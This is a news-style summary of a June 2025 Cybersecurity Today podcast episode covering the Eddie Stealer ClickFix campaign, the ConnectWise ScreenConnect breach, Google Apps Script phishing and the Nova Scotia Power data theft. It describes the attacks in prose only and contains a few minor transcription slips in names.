Cybersecurity Incidents: Eddie Steeler Malware, ConnectWise Breach, and Nova Scotia Power Data Theft
Cybersecurity Today
Host: Jim Love
Release Date: June 2, 2025

1. Eddie Stealer Malware and ClickFix CAPTCHA Phishing

The episode kicks off with an in-depth analysis of a new malware campaign involving the Eddie Stealer, a Rust-based information stealer. This malware is being distributed through the ClickFix CAPTCHA phishing tactic, which manipulates users into executing malicious PowerShell scripts via deceptive CAPTCHA verification pages.

Key Points:

• Deployment Method: Threat actors compromise legitimate websites by injecting malicious JavaScript payloads that display fake CAPTCHA verification prompts, urging users to perform a three-step verification process.
• Execution Process: Users are tricked into copying and pasting obscured PowerShell commands into the Windows Run dialog, which then fetches and executes further malicious scripts from external servers.
• Payload Details: The initial JavaScript payload (G_verify_GJS) downloads the Eddie Stealer binary, which is stored in the Downloads folder with a randomized 12-character filename. Eddie Stealer is capable of harvesting sensitive information, including credentials, browser data, and cryptocurrency wallets.

Notable Quote:

"The main goal of this intermediate script is to fetch the eddystealer binary from the same remote server and store it in the Downloads folder with the SIDO random 12 character file name."
— David Shipley [02:15]

Impact: According to Elastic Security Labs, Eddie Stealer can extract system metadata and siphon data from various applications, posing a significant threat to personal and organizational security.

2. ConnectWise Cyberattack Linked to Nation State Actors

The discussion transitions to a significant breach at ConnectWise, a Florida-based IT management software firm. The breach is suspected to be orchestrated by sophisticated nation-state threat actors, targeting a limited number of ScreenConnect customers.

Key Points:

• Company Response: ConnectWise has engaged Mandiant for forensic investigations and is coordinating with law enforcement to address the breach.
• Affected Services: The primary impact was on the ScreenConnect remote access and support tool, which is widely used by managed service providers and IT departments.
• Scope of Breach: Initial reports suggest the breach occurred in August 2024 and was discovered in May 2025, affecting only cloud-based ScreenConnect instances.
• Vulnerability Details: The incident is linked to a high-severity vulnerability (CVE-2025-3935) in ScreenConnect, patched on April 24th.

Notable Quotes:

"We have launched an investigation with one of the leading forensic experts, Mandiant. We have contacted all the affected customers and are now coordinating with law enforcement."
— ConnectWise Advisory [05:30]

"Only a very small number of customers were impacted, suggesting the threat actor carried out a targeted attack against specific organizations."
— Jason Slagle, President of CNWR [08:45]

Impact: While the exact number of affected customers remains undisclosed, sources indicate that the breach was highly targeted, emphasizing the persistent threats posed by nation-state actors to specialized software solutions.

3. Abuse of Google Apps Scripts in Phishing Attacks

Howard Solomon highlights a novel phishing strategy where attackers exploit Google Apps Scripts to bypass traditional phishing defenses, embedding malicious links within trusted Google-hosted environments.

Key Points:

• Attack Mechanism: Users receive phishing emails containing links that direct them to script.google.com, leveraging the trust associated with Google services to establish legitimacy.
• Google Apps Script Capabilities: This cloud-based JavaScript platform allows developers to automate tasks and integrate with various Google products, making it an attractive medium for attackers to host malicious content without raising immediate suspicions.
• User Deception: By utilizing a trusted domain, threat actors aim to lower the victim's guard, encouraging them to input sensitive information like email credentials without thorough scrutiny.

Notable Quotes:

"By using a trusted platform to host the phishing page, the threat actor creates the false sense of security, obscuring the underlying threat with the goal of getting the recipient to enter their email and password without thinking about it."
— David Shipley [12:05]

"If your team believes that no possible phishes can get by your email filter, they can actually click 140% more on phishing scams."
— Report from Cofens [14:50]

Mitigation Strategies: CISOs are urged to reinforce regular security awareness training, emphasizing vigilance against even seemingly legitimate messages and recognizing that brand association does not guarantee safety.

4. Nova Scotia Power Data Breach Involving Social Insurance Numbers

The final segment addresses a major data breach at Nova Scotia Power, where cyber thieves accessed sensitive customer information, including up to 140,000 social insurance numbers.

Key Points:

• Breach Details: On May 23rd, a ransomware attack compromised the data of approximately 280,000 customers, with around half containing confidential nine-digit social insurance numbers.
• Data Usage: The utility collects Social Insurance Numbers (SINs) to authenticate customer identities, especially in cases of duplicate names, ensuring precise identification and service delivery.
• Corporate Response: Peter Gregg, CEO of Nova Scotia Power, confirmed the breach to the Canadian Press and highlighted the extensive nature of the compromised data.

Notable Quotes:

"We needed the social insurance numbers to differentiate people who had the same name. If there are a number of John McDonald's in the province, the social insurance number determines which one the utility was talking to."
— Peter Gregg, CEO of Nova Scotia Power [19:30]

Impact: This breach stands as one of the largest in Canada, reflecting the escalating risk to utilities that manage highly sensitive customer data. The exposure of SINs poses significant risks for identity theft and fraud among affected individuals.

Conclusion

The episode underscores the evolving landscape of cybersecurity threats, from sophisticated malware distribution methods and targeted nation-state attacks to innovative phishing strategies leveraging trusted platforms. The highlighted incidents emphasize the critical need for robust security measures, continuous monitoring, and comprehensive employee training to mitigate risks and protect sensitive data.

Listener Takeaway: Stay informed about the latest cybersecurity threats, maintain vigilant security practices, and ensure that both technological defenses and human factors are addressed to safeguard against increasingly complex cyberattacks.

This summary was prepared based on the transcript of the June 2, 2025, episode of Cybersecurity Today, hosted by Jim Love. For more insights and updates, consider listening to the full episode.